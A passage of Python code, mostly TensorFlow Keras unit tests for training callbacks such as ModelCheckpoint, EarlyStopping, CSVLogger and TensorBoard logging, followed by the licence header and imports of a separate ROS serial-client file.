keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
])
# The filepath should exist after fitting with callback.
self.assertTrue(os.path.exists(filepath))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
self.assertTrue(os.path.exists(filepath))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
model.load_weights(filepath)
weights_before_additional_fit = model.get_weights()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
])
model.load_weights(filepath)
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, dirnames, filenames) in os.walk(self.logdir):
del dirnames # unused
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensoriBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
if __name__ == '__main__':
test.main()
|
SerialClient.py
|
#!/usr/bin/env python
#####################################################################
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = "mferguson@willowgarage.com (Michael Ferguson)"
import roslib;
import rospy
import imp
import thread
import multiprocessing
